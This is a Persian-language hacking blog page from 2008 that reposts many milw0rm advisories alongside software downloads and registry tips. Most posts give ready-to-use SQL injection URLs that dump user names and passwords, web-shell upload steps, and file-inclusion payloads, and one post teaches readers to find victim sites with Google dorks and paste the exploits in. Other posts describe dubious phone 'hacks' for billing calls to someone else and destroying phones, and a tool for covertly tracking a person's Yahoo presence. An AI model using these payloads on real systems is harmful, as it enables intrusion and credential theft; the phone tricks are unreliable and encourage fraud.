برای دانلود نرم افزار همراه با آموزش به ادامه مطالب بروید
حجمشون کم است
پسورد فایل ها:p30cracker.blogfa.com
ادامه مطلب| +| نوشته شده توسط
محمد در چهارشنبه بیست و یکم فروردین 1387
| |
| | | |
|
|
|
|
شما نیز تاکنون با سیم کارت های سومین اپراتور کشور به نوعی سر و کار داشته اید. سیم کارت های ایرانسل به دلیل نوآوری های متعدد و تبلیغات گسترده و به ویژه قیمت پایین توانسته است حضور موفقی را در عرصه مخابراتی کشور داشته باشد و با استقبال گسترده مردم روبرو شده است. چرا که دیگر شما تنها با 15 هزار تومان یک خط خواهید داشت! به همین دلیل ابتکارات و ویژگی های منحصر به فرد این سیم کارت ها ، مشکلات و نقص هایی که ایرانسل به همراه دارد نیز به نوعی مخفی شده است. علاوه بر توانمندی هایی همانند GPRS و MMS ، ایرانسل قابلیتهای دیگری هم دارد که بسیاری از افراد از آنها بی خبرند. یکی از قابلیتهای فوق العاده ایرانسل که به تازگی ایجاد شده است ، SMS Chat Zone نام دارد. ابزاری که شاید همینک با معرفی آن شما را به خرید یک سیم کارت ایرانسل وسوسه کند! SMS Chat Zone ابزاری است کاملأ رایگان و مجانی که به وسیله آن میتوانید یک ابزار چت کامل را از طریق SMS Chat روی گوشی خود داشته باشید. توسط SMS Chat Zone شما میتوانید با دوستان خود که ایرانسل دارند چت کنید ، دوستان جدیدی را جستجو و پیدا کنید ، از اتاق های چت استفاده کنید و در کل یک محیط چت کامل را روی گوشی خود داشته باشید. همچنین توسط SMS Chat Zone ، شما میتوانید پیام ها و آفلاین های دریافتی در یاهو مسنجر را هم به صورت SMS روی گوشی خود دریافت کنید که خود این موضوع نیز بسیار جالب است! در این ترفند قصد داریم به معرفی نحوه کامل استفاده از SMS Chat Zone به طور کامل بپردازیم.
ادامه مطلب
| +| نوشته شده توسط
محمد در چهارشنبه بیست و یکم فروردین 1387
| |
| | | |
|
|
|
|
برای دیدن عکس این بوتر و دانلودش به ادامه مطالب بروید
ادامه مطلب| +| نوشته شده توسط
محمد در چهارشنبه بیست و یکم فروردین 1387
| |
| | | |
|
|
|
|
بمباران کردن ایمیل یاهو
برای دانلود و دیدنش به ادامه مطالب بروید
ادامه مطلب| +| نوشته شده توسط
محمد در چهارشنبه بیست و یکم فروردین 1387
| |
| | | |
|
|
|
|
##########################################
#
# Koobi v4.4,V5.4 gallery (img_id)
#
ONLY 4.4 AND 5.4
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "index.php?p=gallerypic img_id"
###########################################
EXPLOiT 1:
index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+koobi4_user
EXPLOiT 2:
index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+koobi_user
admin login=admin/login.php
password under page
###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################
# milw0rm.com [2008-04-08]
| +| نوشته شده توسط
محمد در چهارشنبه بیست و یکم فروردین 1387
| |
| | | |
|
|
|
|
اینم از مدیا پلیر ۱۲
لطفا برای دانلود به ادامه مطالب بروید
ادامه مطلب| +| نوشته شده توسط
محمد در سه شنبه بیستم فروردین 1387
| |
| | | |
|
|
|
|
##############################################################################
# ChartDirector Ver 4.1 (viewsource.php) Remote File Disclosure Vulnerability
#
# D Script : http://www.advsofteng.com/download.html
#
#
# By : Stack-Terrorist [v40]
#
# POC : http://site.com/chartdirector/phpdemo/viewsource.php?file=viewsource.php
#
#
##############################################################################
# Greetz : Tryag-Team -JIKI Team GoLd_M [Mahmod_Ali] -H-T Team -RoMaNcYxHaCkEr -Str0ke
##############################################################################
# milw0rm.com [2008-04-07]
| +| نوشته شده توسط
محمد در سه شنبه بیستم فروردین 1387
| |
| | | |
|
|
|
|
برای دیدن کد های مخفی موبایل به ادامه مطالب بروید
ادامه مطلب| +| نوشته شده توسط
محمد در دوشنبه نوزدهم فروردین 1387
| |
| | | |
|
|
|
|
هم اکنون قصد داریم یک ترفند بمب را به شما معرفی کنیم! ترفندی که شاید تاکنون به آن فکر کرده باشید اما آن را امکان پذیر نمیدانستید. در صورتی که شما نیز از کاربران مسنجر محبوب ، یاهو مسنجر بوده باشید حتمأ به این موضوع برخورد کرده اید که در لیست دوستان شما ، امکان مشاهده افراد آنلاین و آفلاین وجود دارد. یعنی کاربرانی که در حال حاضر آنلاین هستند و افرادی که هم اکنون آفلاین هستند. اما برای اولین بار امکان جالبی میسر شده است که به وسیله آن شما میتوانید یک آمار گیر 24 ساعته بر روی هر ID که بخواهید قرار دهید. سپس امکان مشاهده وضعیت آنلاین یا آفلاین بودن ID مورد نظر را در 24 ساعته گذشته و به شکل هر 10 دقیقه مشاهده کنید. به عنوان مثال 1 روز کامل به اینترنت سر نزدید و اطلاع ندارید که دوست شما در یاهو مسنجر آنلاین شده است یا خیر؟ با این ترفند میتوانید آمار آنلاین بودن دوست خود را در 24 ساعت گذشته مشاهده کنید و به نوعی مچ گیری نیز کنید. همانند تصویر زیر:
جالب اینکه تا زمان نگارش این ترفند توسط ترفندستان تنها 2400 نفر از این سرویس استفاده کرده اند ، قطعأ با انتشار این ترفند توسط وب سایت ترفندستان - برای اولین بار در میان سایت های فارسی - این آمار بالا خواهد رفت. پس عجله کنید تا دیر نشده! برای اینکار: ابتدا به آدرس زیر مراجعه کنید: http://www.tarfandestan.com/yahootracker
پس از باز شدن صفحه ، از بالای صفحه روی لینک Register کلیک کنید. اکنون در فرم باز شده اطلاعات خود را وارد نمایید. یک نام کاربری ، پسورد ، تأیید پسورد ، ایمیل و یک سوال امنیتی. پس از پر کردن فرم روی دکمه Register کلیک کنید. پیغام You may now login from the left sidebar به معنای ثبت نام موفقیت آمیز است. حال در قسمت نوار کناری صفحه Yahoo Tracker Login ، یوزر و پسورد ثبت نامی را وارد کرده و دکمه Log in را بزنید. خواهید دید که به صفحه جدیدی وارد میشوید. در این صفحه شما میتوانید آمارگیر های خود را بر روی هر ID تنظیم کنید. در نتیجه در قسمت Add Yahoo! Username for Tracking ، آی دی دوستتان را وارد کرده و دکمه Add را بزنید. پس از اینکار ID شما ثبت میشود. این ID تنها پس از لوگین به قسمت کاربری قابل دسترسی است. اکنون آمارگیر بر روی ID نصب شده است. کافی است در قسمت Track List ، روی آیدی مورد نظر کلیک کنید. وضعیت او را در 24 ساعت گذشته خواهید دید. دقت کنید سیستم کاری این آمارگیر به گونه ای است که پس از ثبت آیدی شروع به گرفتن آمار میکند. در نتیجه پس از ثبت یک آیدی جدید از همان زمان کار آمار گیری را شروع میکند. البته به عنوان مثال اگر آیدی tarfandestan را add کنید ، چون این آیدی قبلأ در دیتابیس سایت ذخیره شده است ، از همان زمانی که برای اولین بار آمارگیری را شروع کرده است اطلاعات را نمایش میدهد. در پایان دقت کنید در صورتی که کاربر Invisible باشد ، وضعیت او به همان شکل آفلاین که طبیعی است نمایش داده خواهد شد.
| +| نوشته شده توسط
محمد در دوشنبه نوزدهم فروردین 1387
| |
| | | |
|
|
|
|
وقتی بچهها يا افراد ناوارد ياد میگيرند كه چگونه Disp Prp شكل و ظاهر سيستم را تغییر میدهد، گاهی وقتها تغییرات نابجایی را در كامپیوترهایی كه مشترك هستند، ايجاد میكنند. میتوانید با اضافه كردن یك متغیر در
HKEY-CURRENT-USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System
تغییرات پیكربندی Disp Prp را متوقف كنید. به تناسب مورد، یك مقدار DWORD ایجاد كنید و دادهِ آن را برابر با یك قرار دهید. برگههای Themes ، Desktop ، ScreenSaver و Setting به ترتیب با مقادیری به نام NoThemesTab ، NoDispBackgroundPage ، NoDispScrSavPage و NoDispSettingsPage متوقف میشوند. مقدار NoDispAppearance هم برگهِ Themes و هم Appearance را متوقف میكند. مقدار NoDispCpl هم به طور كل، كادر Disp Prp را تعطیل میكند.
جلوگیری از تغییر Background
در IE وقتی روی تصویری راست كلیك كرده و گزینهی Set as background را انتخاب میكنید، background تغییر میكند. برای جلوگیری از چنین كاری در كادر محاورهای Run تایپ كنید Regedit و مسیر زیر را دنبال كنید:
HKEY-CURRENT-USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ ActiveDesktop
و یك مقدار DWORD به نام NoChangingWallpaper ايجاد كنید و مقدار آن را یك قرار دهید. توجه داشته باشید این تنظیم فقط برای ویندوز XP است و حتما باید یك عكس را به عنوان Background انتخاب كنید، نه گزینهی None (ولا غیر)
نكته: نسخهی پشتیبان از رجیستری يادتون نره !
اجرای برنامه از طریق كادر محاورهای Run
برنامههایی مثل Regedit و Msconfig را میتوان از طريق كادر محاوره ای Run و بدون نوشتن مسیر آنها اجرا كرد. اما برای اجرای سایر برنامهها، به این شکل، باید یك كلید به رجیستری اضافه كنیم. مسیر زیر را دنبال كنید:
HKEY-LOCAL-MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ App Paths
حالا یك كلید كه نام آن همان نام فایل اجرایی است، اضافه كنید. برای مثال Myprog.exe . مقدار آنرا برابر آدرس كامل برنامه قرار دهید، در مثال ما C:\Program Files\Myprog\Myprog.exe . همچنین میبایست یك String Value ایجاد كنید كه آدرس آن فقط قسمتی از محل مورد نظر شماست كه در مثال ما این آدرس میباشد: C:\Program Files\MyProg
نكته: نسخهی پشتیبان از رجیستری يادتون نره!
توقف Compression
ابزار DiskCleanup در پارتيشنهای NTFS فایلهای قدیمی را برای ایجاد فضای بیشتر فشرده میكند. امّــا محاسبهی ذخیرهسازی و انجام عملیات فشردهسازی زمان زیادی طول میكشد و در بعضی موارد سیستم قفل میكند. اگر چنین اتفاقی میافتد و یا شما هم مثل من آدم صبوری نیستید، برای از كار انداختن Compression مسیر زیر را دنبال كنید:
HKEY-LOCAL-MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Explorer \ VolumeCaches \ Compress Old Files
منبع:http://www.iritn.com
| +| نوشته شده توسط
محمد در دوشنبه نوزدهم فروردین 1387
| |
| | | |
|
|
|
|
به کلید زیر بروید :
HKEY_CLASSES_ROOT\*\Shellex
کلیدي در این شاخه با عنوان SendToNotePad ایجاد کنید .
حال متغیری از نوع string با نام Command ایجاد کرده و مقدار آن را از Default به
NotePad.exe%1 تغییر دهید .
منبع:http://forum.majidonline.com/showthread.php?t=32570
| +| نوشته شده توسط
محمد در دوشنبه نوزدهم فروردین 1387
| |
| | | |
|
|
|
|
براي اين كار طبق معمول وارد بخش رجيستري شويد. حالا به ترتيب قسمت هاي زير را دنبال كنيد: HKEY_CURRENT_USER\software\Microsoft\Windows\Curre nt Version\internt setting حالا در پنجره سمت راست، دنبال عبارتهاي زير بگرديد: 1) MaxConnections PerServer 2) MaxConnectionPerl_ Oserver اگر اين گزينه را مشاهده نميكنيد، روي صفحه سمت راست و سپس New\DWORD را انتخاب كنيد. حال عبارت بالا را بنويسيد و حروف بزرگ را فراموش نكنيد. سپس روي عبارتهاي ساخته شده، دو بار كليك كنيد و در قسمت Dtata Value براي گزينه اول، مقدار 8 و براي گزينه دوم، حرف a را وارد كنيد. سيستم را ريستارت نماييد. حالا قطعاً شاهد سرعت چند درصدي در ارتباطات اينترنتي خود هستيد.
منبع:http://forum.majidonline.com/showthread.php?t=32570
| +| نوشته شده توسط
محمد در دوشنبه نوزدهم فروردین 1387
| |
| | | |
|
|
|
|
اینم از نرم افزار معروف Opera که یک مرورگر سریع برای جستجو در اینترنت می باشد
برای دانلود به ادامه مطالب بروید
قابل اجرا بر روی تمامی گوشی های موبایل
منبع:gsm.ir
ادامه مطلب| +| نوشته شده توسط
محمد در دوشنبه نوزدهم فروردین 1387
| |
| | | |
|
|
|
|
اینم از یاهو مسنجر برای موبایل
برای دیدن عکسش و دانلود به ادامه مطالب بروید
ادامه مطلب| +| نوشته شده توسط
محمد در دوشنبه نوزدهم فروردین 1387
| |
| | | |
|
|
|
|
-------------------------------------------------------------------------
-- JIKI Team [ JIKO + KIl1er ] ---
-------------------------------------------------------------------------
# Author : jiko [jiki team]
# email : jalikom@hotmail.com
# Home : www.no-back.org
# Script : Blog PixelMotion
# Bug : Remote File Upload Vulnerability
# Download : http://www.pixelmotion.org/zip/blog.zip
=========================JIkI Team===================
# Exploit :
uploa your shell
http://[Site]/[script]/admin/modif_config.php
http://[Site]/[script]/templateZip/[shell]
###################OR################
upload your shell compressed by Zip forme
http://[Site]/[script]/admin/modif_config.php
after upload your shell go to
http://[Site]/[script]/templates/[shell]
because your sheel has extract at templates
and has upload at templateZip
=========================JIKI Team===================
greetz : all my friend and H-T Team
-------------------------------------------------------------------------
-- JIKI Team [ JIKO + KIl1er ] --
-------------------------------------------------------------------------
# milw0rm.com [2008-04-06]
| +| نوشته شده توسط
محمد در دوشنبه نوزدهم فروردین 1387
| |
| | | |
|
|
|
|
--==+================================================================================+==--
--==+ Prozilla Forum Service SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--
Discovered By: t0pP8uZz
Discovered On: 7 April 2008
Script Download: http://prozilla.com
DORK: N/A
Vendor Has Not Been Notified!
DESCRIPTION:
Prozilla Forum Service is vulnerable due to a insecure mysql query, this allows the remote attacker
to pull user credentials from the database, and possibly load a shell using OUTFILE. and
even read local files using load_file()
SQL Injection:
http://site.com/forum.php?forum=-1/**/UNION/**/ALL/**/SELECT/**/1,CONCAT(name,0x3a,password),3,4/**/FROM/**/users/*
NOTE/TIP:
admin login is at /siteadmin/
admin login can be found in config.php which can be viewed by using load_file().
GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !
--==+================================================================================+==--
--==+ Prozilla Forum Service SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--
# milw0rm.com [2008-04-06]
| +| نوشته شده توسط
محمد در دوشنبه نوزدهم فروردین 1387
| |
| | | |
|
|
|
|
###################################################################################
# #
# MyBulletin Board (MyBB) Plugin "Custom Pages 1.0" - SQL Injection Vulnerability #
# #
# found by: Lidloses_Auge #
# Contact (ICQ): 120946783 #
# Greetz to: free-hack.com #
# #
###############################################################################################################################################
# #
# Vulnerability: #
# #
# Document: pages.php #
# GET-Parameter: page #
# #
# Dork: #
# #
# inurl:"pages.php" + intext:"powered by mybb" #
# #
# Example: #
# #
# http://[target]/pages.php?page='union/**/select/**/1,unhex(hex(concat_ws(0x202d20,username,password))),3,4,5,6,7/**/FROM/**/mybb_users/* #
# #
# Notes: #
# #
# Successrate depends on the permissions which could be set for viewing the 'page' #
# #
###############################################################################################################################################
# milw0rm.com [2008-04-06]
| +| نوشته شده توسط
محمد در یکشنبه هجدهم فروردین 1387
| |
| | | |
|
|
|
|
سلام دوستان عزیز راستش خودم بدجوری دنبال این بودم
گفتم که شایدم که یکی مثل من باشه -> پس گفتم که بزارمش بچه ها استفاده کنن -> امیدوارم خوشتون بیاد
برای هک کردن موبایل کسی باید گوشی اون رو یک بار به دستتون بگیرید و شماره تلفن خودتون رو به صورت زیر بگیرید.مثلا اگر شماره شما :: ۰۹۱۷۷۸۲۵۰۱۰ بود شما باید به صورت :
*۰۹۱۷۷۸۲۵۰۱۰ بگیرید یعنی جولوش یک ستاره بگذارید.و وقتی شما ره گرفته شد کافیه گوشیتونو بردارید تا ارتباط برقرار شود.خب حالا در واقع میتونیم بگیم که گوشی قربانی هک شد.و مرحله حساس این است که بدونیم چه جوری میشه بقیه کارو انجام داد.حالا ما در این حالت میتونیم ۳ تا کار رو آنجام بدبیم.در قسمت زیر به اون سه کار اشاره شده، د میزنم واین آموزش سه کاری است که در ادامه ترفند بالا بر روی گوشی قربانی قابل اجرا است:
۱:عدد ۲۳ رو شماره گیری کنید و بعد از شنیدن بوق آزاد شماره بگیرید و پول رو به حساب ..........۲:فقط کافیست بعد هک کردن گوشی دکمه * ( ستاره ) رو فشار بدید و خط قربانی رو کنترل کنید.۳:عدد ۶۷۶۷۵۴۳۲ رو شماره گیری کنید وok یا همان دکمه اتصال را فشار دهید بعد با پیغامی رو به رو میشوید که میگه ارتباط قطع شد یعنی گوشی سوخت.
کلیه این روشها امتحان شده هستند پس سعی کنید حتالمقدور در مورد گوشی ههای ارزان قیمت امتحان کنین که ضرر مالی زیادی گریبان گیر شما نشود!
تلفن زدن با موبایل اماااااااا به حساب دیگری:
شما ميتونيد با مبايلتون هر چندتا خواستيد تلفن بزنيد و هزينه ها را به حساب يه نفر ديگه بزاريد خیلی با حال نه؟ براي اينكار بايد يه كارهايي انجام بدين به اين صورت : اول مبايل اون شخصي را كه مي خواهيد هزينه ها را بپردازد بر داريد و شماره اي را كه ميخواهيد هزينه اش برداشته بشه را بگيريد البته قبلش يك + يا 90+ اضافه كنيد مثلاْ به اين صورت :09133107777+ كه در نتيجه ديگه هزينه به صورت حساب اين شماره اضافه نميشه و همش ميره به حساب كسي كه شما اين شماره را با مبايلش گرفتيد البته اين كار با دزدي فرقي نداره اما صد در صد جواب ميده و خود مخابرات هم اعلام كرده که همچنان راهي براي اين مشكل پيدا نكردن ! پس از امرو موبایلتون رو دست همه کس ندین !
این روش هم مانند روش بالا کاملا امتحان شده!
در این روش هر وقت فیش مو بایلتون از حد معمول بیشتر شد برید و پرینت اونو از مخابرات بخواین و وقتی پرینت رو گرفتین ببینین قسمت (بدهکار) و (بستانکار) موبایلتون با هم برابره یا نه اگه با هم برابر نبود مصبب اونو حلال کنینا که اون دنیا دیگه نمک گیرتون نشه
منبع:http://behzadhacker.blogfa.com
| +| نوشته شده توسط
محمد در یکشنبه هجدهم فروردین 1387
| |
| | | |
|
|
|
|
اینم از آنتی ویروس جدید و معروف Avast 4.8
دانلود | +| نوشته شده توسط
محمد در یکشنبه هجدهم فروردین 1387
| |
| | | |
|
|
|
|
--==+ Entertainment Directory <= 1.1 SQL Injection Vulnerbility +==--
--==+================================================================================+==--
Discovered By: t0pP8uZz & xprog
Discovered On: 5 April 2008
Script Download: http://www.turnkeyzone.com
DORK: N/A
Vendor Has Not Been Notified!
DESCRIPTION:
Entertainment directory is vulnerable due to a insecure mysql query. this allows the remote attacker
to obtain user credentials from the database.
EXPLOITS:
http://site.com/directory.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,CONCAT(username,char(58),password),9,10,11,12,13,14/**/FROM/**/users/*
NOTE/TIP:
GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew!
--==+================================================================================+==--
--==+ Entertainment Directory <= 1.1 SQL Injection Vulnerbility +==--
--==+================================================================================+==--
# milw0rm.com [2008-04-05]
| +| نوشته شده توسط
محمد در یکشنبه هجدهم فروردین 1387
| |
| | | |
|
|
|
|
########################################################################
# #
# ...:::::Blogator-script 0.95 SQL Injection Vulnerbility ::::.... #
########################################################################
Virangar Security Team
www.virangar.org
www.virangar.net
--------
Discoverd By :virangar security team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & all hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :)
-----------------------------------
dork: inurl:/_blogadata/
-----------------------------------
vuln code in /_blogadata/include/sond_result.php:
line 27: $id_art=$_GET['id_art'];
......
line 34: $sql_res=mysql_query("SELECT sond_rep, votes_H, votes_F FROM sondage_rep WHERE id_sond = $id_art ORDER BY ordre");
------------
vuln:
http://www.site.com/_blogadata/include/sond_result.php?id_art=-99999/**/union/**/select/**/concat(pseudo,0x3a,pass,char(58),email),2,3/**/from/**/membre/**/where/**/id_membre=1/*
--------------------------------
you can see in Blogator-script other injection bugs too ;)
# milw0rm.com [2008-04-04]
| +| نوشته شده توسط
محمد در شنبه هفدهم فروردین 1387
| |
| | | |
|
|
|
|
برای استفاده از این باگ ها مثلا در یک قسمت نوشته allinurl: "index.php?mod=galerie"action=gal باید به سایت گوگل رفته و آن عبارت را در کادر متن جستجو paste می کنیم و بعدا دکمه جستجو را می زنیم در این قسمت تعدادی سایت ژیدا شده است که ما یکی از آنها را باز می کنیم و در قسمت آدرس تا گزینه index.php را پاک کرده و به جای از EXPLOiT ها استفاده می کنیم یعنی اکسژلویت آن را به جای آدرس های پاک شده paste می کنیم
| +| نوشته شده توسط
محمد در پنجشنبه پانزدهم فروردین 1387
| |
| | | |
|
|
|
|
##########################################
#
# KwsPHP v1.3.456 (galerie)SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "index.php?mod=galerie"action=gal
#
###########################################
EXPLOiT :
index.php?mod=galerie&action=gal&id_gal=-99999/**/union/**/select/**/0,1,concat(pseudo,0x3a,pass),concat(pseudo,0x3a,pass),4,5,6,7/**/from/**/users/*
###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################
# milw0rm.com [2008-04-03]
| +| نوشته شده توسط
محمد در پنجشنبه پانزدهم فروردین 1387
| |
| | | |
|
|
|
|
##########################################
#
# KwsPHP v1.3.456 (archives)SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "index.php?mod=archives"
#
###########################################
EXPLOiT 1:
index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0x3a,pass),7,8,9,10,11,12,13/**/from/**/users/*
EXPLOiT 2:
index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0x3a,pass),7,8,9,10/**/from/**/users/*
EXPLOiT 3:
index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0x3a,pass),7,8,9,10,11,12,13,14/**/from/**/users/*
###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################
# milw0rm.com [2008-04-03]
| +| نوشته شده توسط
محمد در پنجشنبه پانزدهم فروردین 1387
| |
| | | |
|
|
|
|
cript Name : PHP Block a8.4
Download : http://sourceforge.net/project/downloading.php?group_id=186381&use_mirror=surfnet&filename=a8.4.zip&73507325
Error : include_once $PATH_TO_CODE."/script/fonction.php";
Vul Code : http://[site]/[Path]/modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=http://[ShellCode]
Greetz : Kezzap66345 - Str0ke - Dread 35
# milw0rm.com [2008-04-02]
| +| نوشته شده توسط
محمد در پنجشنبه پانزدهم فروردین 1387
| |
| | | |
|
|
|
|
/==============================================================================================================\
| |
| [o] Online FlashQuiz 1.0.2 Remote File Inclusion Vulnerability |
| |
| Software : com_onlineflashquiz version 1.0.2 - paid component |
| Developer : www.elearningforce.biz |
| Author : NoGe |
| Contact : noge[dot]code[at]gmail[dot]com |
| |
|==============================================================================================================|
| |
| [o] Vulnerable file |
| |
| component/com_onlineflashquiz/quiz/common/db_config.inc.php |
| |
| include_once($base_dir."common/classes/DBBase.class.php"); |
| |
| |
| |
| [o] Exploit |
| |
| http://localhost/path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=[evilcode] |
| |
|==============================================================================================================|
| |
| [o] Greetz |
| |
| all crew #papuahacker #baliemhackerlink #nyubicrew |
| skulmatic olibekas ulga Cungkee nyubi k1tk4t str0ke |
| yooogy H312Y Vrs-hCk Oon_Boy Paman mousekill }^-^{ SiKodoQ |
| http://kapukvalley.net member |
| |
\==============================================================================================================/
# milw0rm.com [2008-04-02]
| +| نوشته شده توسط
محمد در پنجشنبه پانزدهم فروردین 1387
| |
| | | |
|
|
|
|
اینم دانلود آخرین نسخه از مرور گر وب فایر فاکس
دانلود | +| نوشته شده توسط
محمد در چهارشنبه چهاردهم فروردین 1387
| |
| | | |
|
|
|
|
##########################################
#
# Powered by Smoothflash SQL injection
# Powered by Newartonline
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : "Powered by Smoothflash"
#
# DORK 2 : allinurl: "admin_view_image.php"
#
###########################################
EXPLOiT :
admin_view_image.php?cid=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/lwsp_users
admin login on frontpage
###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################
# milw0rm.com [2008-03-30]
| +| نوشته شده توسط
محمد در دوشنبه دوازدهم فروردین 1387
| |
| | | |
|
|
|
|
[~] KISGB (Keep It Simple Guest Book) : Local FiLe Include's (tmp_theme)
[~]
[~] Version : All Versions
[~]
[~] Download : http://sourceforge.net/project/showfiles.php?group_id=38585
[~] ----------------------------------------------------------
[~] Exploit coded and founded by Cr@zy_King
[~]
[~] Date: 30.03.2008
[~]
[~]
[~] crazy_kinq@hotmail.co.uk
[~]
[~] -----------------------------------------------------------
[~] Greetz tO:-
[~]
[~] Digital-AngeLs Bug Researchers Yakinda OnLine :) Loading.
[~]
[~] [Peace Crew] Kerem125 - Alemin_Krali - m0sted - UyussMan
[~]
[~] Eno7 | Crackers_Child | Ghost61 | str0ke | [Hx] | [03xTr] | The_Bekir
[~]----------------------- | | |
